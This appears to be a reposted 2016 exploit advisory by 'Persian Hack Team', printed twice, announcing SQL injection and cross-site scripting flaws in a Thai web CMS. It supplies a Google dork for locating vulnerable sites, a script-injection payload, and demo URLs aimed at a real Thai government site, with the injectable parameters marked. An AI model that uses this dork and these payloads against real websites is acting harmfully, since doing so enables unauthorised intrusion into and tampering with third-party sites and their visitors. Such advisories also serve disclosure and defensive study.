######################
# Exploit Title : CityVariety Corporation Multiple Vulnerabilities
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.cityvariety.co.th/
# Google Dork : inurl:"index.php?options=newsall"
# Date: 2016/02/06
#
######################
# PoC:
# --SQL Injection
# Parameter: id
# --Cross Site Scripting
# Parameter: mode
# Payload:"><script>alert(1)</script>
# Demo:
# www.maelad.go.th/index.php?options=newsall&mode=detail&id=7418
# www.maelad.go.th/index.php?options=newsall&mode=[XSS]&id=[SQL]
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################
# Exploit Title : CityVariety Corporation Multiple Vulnerabilities
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.cityvariety.co.th/
# Google Dork : inurl:"index.php?options=newsall"
# Date: 2016/02/06
#
######################
# PoC:
# --SQL Injection
# Parameter: id
# --Cross Site Scripting
# Parameter: mode
# Payload:"><script>alert(1)</script>
# Demo:
# www.maelad.go.th/index.php?options=newsall&mode=detail&id=7418
# www.maelad.go.th/index.php?options=newsall&mode=[XSS]&id=[SQL]
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################
0 nhận xét:
Post a Comment